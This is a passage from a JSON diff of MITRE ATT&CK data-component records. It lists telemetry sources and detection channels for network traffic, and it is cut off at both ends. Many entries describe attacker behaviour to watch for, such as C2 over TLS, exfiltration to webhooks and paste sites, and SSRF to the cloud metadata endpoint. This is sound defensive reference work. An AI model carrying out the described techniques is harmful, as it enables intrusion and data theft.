+                            "name": "NSM:Content",
+                            "channel": "SSL Certificate Metadata"
+                        },
+                        {
+                            "name": "NSM:Content",
+                            "channel": "HTTP Header Metadata"
+                        },
+                        {
+                            "name": "NSM:Content",
+                            "channel": "TLS Fingerprint and Certificate Analysis"
+                        },
+                        {
+                            "name": "NSM:Content",
+                            "channel": "Traffic on RPC DRSUAPI"
+                        },
+                        {
+                            "name": "NSM:Firewall",
+                            "channel": "TLS/HTTP inspection"
+                        },
+                        {
+                            "name": "NSM:Firewall",
+                            "channel": "High rate of inbound TCP SYN or ACK packets with missing 3-way handshake completion"
+                        },
+                        {
+                            "name": "NSM:Firewall",
+                            "channel": "Anomalous TCP SYN or ACK spikes from specific source or interface"
+                        },
+                        {
+                            "name": "NSM:Firewall",
+                            "channel": "Outbound encrypted traffic"
+                        },
+                        {
+                            "name": "NSM:Firewall",
+                            "channel": "ICMP/UDP protocol anomaly"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "mqtt.log / xmpp.log (custom log feeds)"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "mqtt.log or AMQP custom log"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "mqtt.log, xmpp.log, amqp.log"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "TCP/UDP"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "TCP session tracking"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Captured packet payloads"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "session behavior"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "External C2 channel over TLS"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "http/file-xfer: Inbound/outbound transfer of ELF shared objects"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "http.log, files.log"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "unexpected network activity initiated shortly after shell session starts"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "HTTP/WebDAV requests that contain NTLMSSP or PROPFIND/MOVE/OPTIONS with Authorization: NTLM"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "http.log, ssl.log"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "http.log, conn.log"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "SPAN or port-mirrored HTTP/S"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "http.log, ssl.log, websocket.log"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "ssl.log"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Browser connections to known C2 or dynamic DNS domains"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Session History Reset"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "HTTP "
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "query: High-volume LDAP traffic with filters targeting groupPolicyContainer attributes"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "HTTP/TLS Logs"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Suspicious URL patterns, uncommon TLDs, short-lived domains, URL shorteners; HTTP method GET/POST"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Suspicious URL patterns, uncommon TLDs, URL shorteners"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Suspicious GET/POST; downloader patterns"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "SSH logins or scp activity"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "remote login and transfer"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "conn.log"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Suspicious long-lived or reattached remote desktop sessions from unexpected IPs"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "HTTP payloads with SQLi/LFI/JNDI/deserialization indicators"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "outbound egress from web host after suspicious request"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Requests towards cloud metadata or command & control from pod IPs"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Connections to TCP 427 (SLP) or vCenter web services from untrusted sources"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "NetFlow/sFlow for odd egress to Internet from mgmt plane"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "packet capture or DPI logs"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "http.log"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "SMB2_LOGOFF/SMB_TREE_DISCONNECT"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Unusual Base64-encoded content in URI, headers, or POST body"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Base64 strings or gzip in URI, headers, or POST body"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Inbound connections to 445, 3389, 5985-5986 with high error/connection-reset rate, followed by new outbound sessions from the same host to internal assets within short interval."
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Inbound connections to monitored service ports from external or unusual internal sources; rapid follow-on lateral connections from the same host."
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Inbound to tcp/427 (OpenSLP), tcp/443 (vSphere APIs), tcp/902, tcp/5989 followed by new unexpected outbound sessions from the ESXi/vCenter host."
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Inbound to 22/5900/8080 and follow-on internal connections."
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "http: HTTP body or headers contain long Base64 sections; gzip/deflate + Base64"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "http: HTTP body contains long Base64 sections"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "http: Base64/MIME looking payloads from ESXi host IP"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "LDAP Bind/Search"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "LDAP Query"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "smtp.log"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "smtp.log, conn.log"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "remote CLI session detection"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "http.log, ftp.log"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "PCAP inspection"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "large HTTPS POST requests to webhook endpoints"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Single, low-volume inbound packet (REJ/S0/OTH or uncommon dport/protocol) from src_ip followed by outbound SF connection to src_ip."
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Rare inbound packet characteristics (ICMP/UDP/TCP to uncommon port) from src_ip followed \u2264TimeWindow by outbound SF from same host to src_ip."
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Inbound one-off packet to uncommon port \u2192 outbound SF to same src_ip within TimeWindow."
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "large upload to firmware interface port or path"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "http.request: HTTP requests and responses for specific script resources, unexpected content-types (application/octet-stream for script URLs), suspicious referrers, or obfuscated javascript resources"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "http::response: HTTP responses with suspicious content-type for scripts, long obfuscated javascript bodies, or redirects to exploit kit domains"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "HTTP/HTTPS requests for script resources flagged by content inspection (excessive obfuscation, eval usage, unusual redirects)"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "ssl.log + http.log"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "http/file-xfer: Outbound transfer of large video-like MIME types soon after capture"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Outbound SCP, TFTP, or FTP sessions carrying configuration file content"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Session Transfer Content"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Captured File Content"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "C2 exfiltration"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Transferred file observations"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "http::post: Outbound HTTP POST from host shortly after DB export activity"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "HTTPS API requests to Dropbox, iCloud, Google Drive, OneDrive shortly after DB tool usage"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Observed downgrade in negotiated cipher suites or TLS/SSH versions across sessions"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "New egress from container IP/namespace to Internet or non-approved CIDRs/ASNs"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "New VM egress to crypto-mining pools or non-approved Internet ranges within minutes of boot"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "http::request: Network connection to package registry or C2 from interpreter shortly after install"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "http::request: Outbound HTTP initiated by Python interpreter"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "DrsAddEntry, DrsReplicaAdd, GetNCChanges calls between non-DC and DCs."
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "large HTTPS POST requests to text storage domains"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Unexpected ARP replies or DNS responses inconsistent with authoritative servers"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "TLS downgrade or inconsistent DNS answers"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Unusual request pattern leading up to service crash (e.g., malformed or oversized payload)"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "conn.log or http.log"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "http: HTTP bodies/headers contain long tokens with non-standard alphabets or constant-size periodic POSTs"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "dns: DNS labels with excessive length and restricted custom alphabets (e.g., base36 only) repeated frequently"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "http: suspicious long tokens with custom alphabets in body/headers"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "http: HTTP bodies from ESXi host IPs containing long, non-standard tokens"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Traffic patterns showing downgrade from strong encryption (AES-256) to weaker or plaintext protocols"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "HTTP(S) requests with User-Agents typical of PowerShell or curl from desktop; or URIs matching paste-inspired payload hosts"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Egress to non-approved networks from host after terminal exec"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Flow/PCAP analysis for outbound payloads"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "conn.log + files.log + ssl.log"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "HTTPS or custom protocol traffic with large payloads"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Unexpected script or binary content returned in HTTP response body"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Injected content responses with unexpected script/malware signatures"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Content injection observed in HTTPS responses with mismatched certificates or altered payloads"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Relay patterns across IP hops"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "ldap.log"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Probe responses from unauthorized APs responding to client probe requests"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Excessive gratuitous ARP replies on local subnet"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Inbound HTTP POST with suspicious payload size or user-agent"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "POST requests to .php, .jsp, .aspx files with high entropy body"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "dns.log"
+                        },
+                        {
+                            "name": "NSM:FLow",
+                            "channel": "dns.log"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Encrypted tunnels or proxy traffic to non-standard destinations"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "large transfer from management IPs to unauthorized host"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Sustained abnormal inbound request rate targeting application ports (e.g., 80/443/25)"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "ftp.log, smb_files.log"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "ftp.log, conn.log"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "mirror/SPAN port"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "ftp.log, conn.log, smb_files.log"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "SSL/TLS Inspection or PCAP"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "conn.log, ssl.log"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "http, dns, smb, ssl logs"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "dns, ssl, conn"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "conn.log, http.log, dns.log, ssl.log"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "ICMP/UDP traffic (Wireshark, Suricata, Zeek)"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "icmp.log, weird.log"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "ICMP/UDP monitoring (tcpdump, Wireshark, Zeek)"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Unusual responses to LLMNR (UDP 5355) or NBT-NS (UDP 137) queries from unauthorized hosts"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "DHCP OFFER or ACK with unauthorized DNS/gateway parameters"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Multiple DHCP OFFER responses for a single DISCOVER"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "SSL/TLS Handshake Analysis"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "HTTP Header Metadata"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Network Capture TLS/HTTP"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "container egress to unknown IPs/domains"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "HTTP Request Logging"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "ssh connections originating from third-party CIDRs"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "ssh/smb connections to internal resources from third-party devices"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Degraded encryption throughput or switch to weaker cipher suites compared to historical baselines"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "ssl.log (for TLS handshake analysis), dns.log (tunneling indicators)"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "host switch egress data"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Outbound HTTP/S"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "ssl.log - Certificate Analysis"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "ssl.log, conn.log"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "ssl.log, x509.log"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Packets with unusual flags or payloads outside established flows (e.g., WoL magic FF\u00d76 + 16\u00d7MAC)"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Suspicious POSTs to upload endpoints"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "TLS/HTTP download with atypical MIME (application/octet-stream, application/x-zip, application/x-gzip) followed by local decode/write"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "HTTP(S)/QUIC media download with opaque content types (image/*, audio/*, video/*) from non-gallery domains or CDNs not previously used by the app"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "HTTP(S)/QUIC download of executable/opaque content (application/octet-stream, application/zip, application/java-archive, application/x-dex, application/x-sharedlib, text/javascript)"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "burst of DNS queries/connection attempts to RFC1918 or local gateway immediately after scans"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "HTTPS sessions exhibiting periodic request cadence or structured payload exchanges inconsistent with application baseline"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Application-layer indicators observable via enterprise network controls (HTTP method, URI path pattern class, TLS SNI, JA3/ALPN when available, DNS qname/type) showing anomalous or low-and-slow command polling behavior"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Near-term increase in traffic to identity endpoints associated with SMS MFA, account recovery, or OTP verification (IdP, banking, crypto), correlated to SIM/service loss"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Abrupt shift from cellular egress to Wi-Fi-only egress, or new VPN/proxy session establishment following cellular service loss"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Application-layer web traffic showing suspicious redirect chains, iframe/ad-tech cascades, user-agent or environment fingerprinting requests, or staged payload retrieval after page visit"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Application initiates HTTPS connection with repeated certificate validation failure under enterprise proxy followed by direct network retry or stable opaque TLS communication to same endpoint within correlation window"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "App-destination pair shows consistent inspection bypass/refusal pattern followed by direct encrypted communication or repeated short-lived TLS sessions to same endpoint within correlation window"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Application retrieves remote content from non-baselined domain or IP and the transfer direction is inbound to device during the file acquisition phase"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Managed iOS app retrieves remote content from non-baselined domain or IP with inbound payload transfer during the acquisition phase"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Device shows correlated inbound session establishment followed by outbound connections to separate external destinations with overlapping timing and relay-like byte symmetry"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Traffic spike preceding control crash"
+                        },
+                        {
+                            "name": "NSM:Inspection",
+                            "channel": "TLS session from mobile app fails, resets, or refuses enterprise interception while same destination/app pair repeatedly establishes direct encrypted communication pattern consistent with pinned certificate/public-key validation"
+                        },
+                        {
+                            "name": "NSM:Inspection",
+                            "channel": "TLS handshake from iOS app repeatedly fails or is rejected only when enterprise SSL inspection certificate is presented, indicating certificate or public-key pin validation effect"
+                        },
+                        {
+                            "name": "saas:box",
+                            "channel": "API calls exceeding baseline thresholds"
+                        },
+                        {
+                            "name": "saas:confluence",
+                            "channel": "REST API access from non-browser agents"
+                        },
+                        {
+                            "name": "TelecomLogs:SS7Signaling",
+                            "channel": "Subscriber information queries, routing requests, or location update messages with anomalous node identifiers or unexpected origin patterns"
+                        },
+                        {
+                            "name": "TelecomLogs:SS7Signaling",
+                            "channel": "Location resolution, routing, or subscriber information exchanges with anomalous signaling paths or node identities"
+                        },
+                        {
+                            "name": "VPN:MobileProxy",
+                            "channel": "Supervised or newly activated device initiates outbound connections to destinations outside Apple, MDM, update, or enterprise-managed baselines while locked, with no recent user interaction, or before expected app enrollment completion"
+                        },
+                        {
+                            "name": "VPN:MobileProxy",
+                            "channel": "Application or device component communicates with legitimate external web-service infrastructure such as cloud storage, social media, messaging, collaboration, paste, code-hosting, CDN-backed API, or generic HTTPS service in a pattern inconsistent with the app's approved network baseline, timing, or service class"
+                        },
+                        {
+                            "name": "VPN:MobileProxy",
+                            "channel": "Supervised device or managed app communicates with legitimate external web-service infrastructure such as cloud storage, messaging, collaboration, social, paste, or generic HTTPS API platforms in a pattern inconsistent with expected service baseline, managed app role, or normal background refresh behavior"
+                        },
+                        {
+                            "name": "VPN:MobileProxy",
+                            "channel": "App-attributed HTTP GET or HTTPS session to public web platform (social, paste, collaboration, cloud storage, code-hosting) returned content followed by outbound connection to a different domain or IP within TimeWindow"
+                        },
+                        {
+                            "name": "VPN:MobileProxy",
+                            "channel": "DNS query or TLS SNI for previously unseen domain occurred within TimeWindow after session to legitimate web-service domain from same app identity"
+                        },
+                        {
+                            "name": "VPN:MobileProxy",
+                            "channel": "Initial session to public web-service domain transferred small response payload followed by connection to new external endpoint with different ASN or domain category"
+                        },
+                        {
+                            "name": "VPN:MobileProxy",
+                            "channel": "App-attributed session to public web-service domain included inbound content retrieval followed by outbound POST, PUT, upload, comment, message send, document update, or API write to same service class within TimeWindow"
+                        },
+                        {
+                            "name": "VPN:MobileProxy",
+                            "channel": "Repeated alternating inbound and outbound sessions to same public web-service domain or API endpoint occurred from same app identity with stable recurrence interval"
+                        },
+                        {
+                            "name": "VPN:MobileProxy",
+                            "channel": "Outbound write operation to public web-service domain occurred after small inbound response retrieval from same domain or service class without preceding user-visible foreground activity"
+                        },
+                        {
+                            "name": "VPN:MobileProxy",
+                            "channel": "App-attributed HTTP GET, content fetch, sync pull, or inbound-oriented HTTPS session to public web-service domain recurred within TimeWindow without app-attributed POST, PUT, PATCH, upload, comment, message send, or API write to same service class"
+                        },
+                        {
+                            "name": "VPN:MobileProxy",
+                            "channel": "Repeated app-attributed retrieval from same public web-service domain or API endpoint occurred at stable recurrence interval with low outbound volume relative to inbound content"
+                        },
+                        {
+                            "name": "VPN:MobileProxy",
+                            "channel": "Inbound content retrieval from public web-service domain occurred without subsequent writeback to same service class and was followed by local or downstream activity outside normal app sync profile"
+                        },
+                        {
+                            "name": "VPN:MobileProxy",
+                            "channel": "TLS handshake, HTTP method/header pattern, or WebSocket upgrade was observed on destination port outside approved port set for detected protocol during app-attributed outbound session"
+                        },
+                        {
+                            "name": "VPN:MobileProxy",
+                            "channel": "Repeated app-attributed sessions to same destination or service class used non-standard destination port with stable recurrence interval or persistent connection behavior"
+                        },
+                        {
+                            "name": "VPN:MobileProxy",
+                            "channel": "Destination port was not in approved protocol-to-port mapping for app identity or service class and session did not match known enterprise proxy, relay, or developer tooling exception"
+                        },
+                        {
+                            "name": "VPN:MobileProxy",
+                            "channel": "Observed protocol-to-port pairing was outside approved mapping for managed bundle or service class and did not match enterprise proxy, relay, or developer tooling exception"
+                        },
+                        {
+                            "name": "WebProxy:AccessLogs",
+                            "channel": "SSRF-like patterns accessing metadata endpoint through proxy (e.g., Host: 169.254.169.254)"
+                        },
+                        {
+                            "name": "WIDS:AssociationLogs",
+                            "channel": "Unauthorized AP or anomalous MAC address connection attempts"
+                        },
+                        {
+                            "name": "WinEventLog:iis",
+                            "channel": "IIS Logs"
+                        },
+                        {
+                            "name": "WinEventLog:Microsoft-Windows-Windows Defender/Operational",
+                            "channel": "Unusual external domain access"
+                        },
+                        {
+                            "name": "WinEventLog:Sysmon",
+                            "channel": "Outbound requests with forged tokens/cookies in headers"
+                        },
+                        {
+                            "name": "WinEventLog:System",
+                            "channel": "EventCode=5005 (WLAN), EventCode=302 (Bluetooth)"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "2.1",
+                    "x_mitre_domains": [
+                        "ics-attack",
+                        "mobile-attack",
+                        "enterprise-attack"
+                    ],
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.771000+00:00\", \"old_value\": \"2026-04-22 14:48:50.367000+00:00\"}}}",
+                    "previous_version": "2.1"
+                },
+                {
+                    "type": "x-mitre-data-component",
+                    "id": "x-mitre-data-component--a7f22107-02e5-4982-9067-6625d4a1765a",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2021-10-20 15:05:19.274000+00:00",
+                    "modified": "2026-05-12 15:12:00.777000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/datacomponents/DC0078",
+                            "external_id": "DC0078"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Network Traffic Flow",
+                    "description": "Summarized network packet data that captures session-level details such as source/destination IPs, ports, protocol types, timestamps, and data volume, without storing full packet payloads. This is commonly used for traffic analysis, anomaly detection, and network performance monitoring.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_log_sources": [
+                        {
+                            "name": "Network Traffic",
+                            "channel": "None"
+                        },
+                        {
+                            "name": "macos:osquery",
+                            "channel": "socket_events"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Unexpected flows between segmented networks or prohibited ports"
+                        },
+                        {
+                            "name": "snmp:config",
+                            "channel": "Configuration change traps or policy enforcement failures"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "First-time outbound connections to package registries or unknown hosts immediately after restore/build"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "First-time egress to new registries/CDNs post-install/build"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "First-time egress to non-approved registries after dependency install"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Outbound connections to TCP 139,445 and HTTP/HTTPS to WebDAV endpoints from workstation subnets"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "large outbound data flows or long-duration connections"
+                        },
+                        {
+                            "name": "AWS:VPCFlowLogs",
+                            "channel": "egress > 90th percentile or frequent connection reuse"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "conn.log"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "socket/connect"
+                        },
+                        {
+                            "name": "esxi:syslog",
+                            "channel": "esxcli network vswitch or DNS resolver configuration updates"
+                        },
+                        {
+                            "name": "esxi:vobd",
+                            "channel": "Network Events"
+                        },
+                        {
+                            "name": "iptables:LOG",
+                            "channel": "TCP connections"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "connection metadata"
+                        },
+                        {
+                            "name": "wineventlog:dhcp",
+                            "channel": "DHCP Lease Granted"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "LEASE_GRANTED"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "MAC not in allow-list acquiring IP (DHCP)"
+                        },
+                        {
+                            "name": "Windows Firewall Log",
+                            "channel": "SMB over high port"
+                        },
+                        {
+                            "name": "NSM:Connections",
+                            "channel": "Internal connection logging"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "pf firewall logs"
+                        },
+                        {
+                            "name": "esxi:vmkernel",
+                            "channel": "/var/log/vmkernel.log"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Inter-segment traffic"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "None"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Long-lived or hijacked SSH sessions maintained with no active user activity"
+                        },
+                        {
+                            "name": "AWS:VPCFlowLogs",
+                            "channel": "VPC/NSG flow logs for pod/instance egress to Internet or metadata"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Suspicious outbound traffic from browser binary to non-standard domains"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Abnormal browser traffic volume or destination"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Outbound requests to domains not previously resolved or associated with phishing campaigns"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Outbound traffic to domains/IPs not previously resolved, occurring shortly after attachment download or link click"
+                        },
+                        {
+                            "name": "M365Defender:DeviceNetworkEvents",
+                            "channel": "NetworkConnection: bytes_sent >> bytes_received anomaly"
+                        },
+                        {
+                            "name": "PF:Logs",
+                            "channel": "outbound flows with bytes_out >> bytes_in"
+                        },
+                        {
+                            "name": "NSX:FlowLogs",
+                            "channel": "network_flow: bytes_out >> bytes_in to external"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "NetFlow/Zeek conn.log"
+                        },
+                        {
+                            "name": "AWS:VPCFlowLogs",
+                            "channel": "Outbound data flows"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Flow records with entropy signatures resembling symmetric encryption"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "flow records"
+                        },
+                        {
+                            "name": "networkdevice:syslog",
+                            "channel": "flow records"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "HTTPS POST to known webhook URLs"
+                        },
+                        {
+                            "name": "saas:api",
+                            "channel": "Webhook registrations or repeated POST activity"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Source/destination IP translation inconsistent with intended policy"
+                        },
+                        {
+                            "name": "SNMP:DeviceLogs",
+                            "channel": "Unexpected NAT translation statistics or rule insertion events"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Sudden spike in incoming flows to web service ports from single/multiple IPs"
+                        },
+                        {
+                            "name": "AWS:VPCFlowLogs",
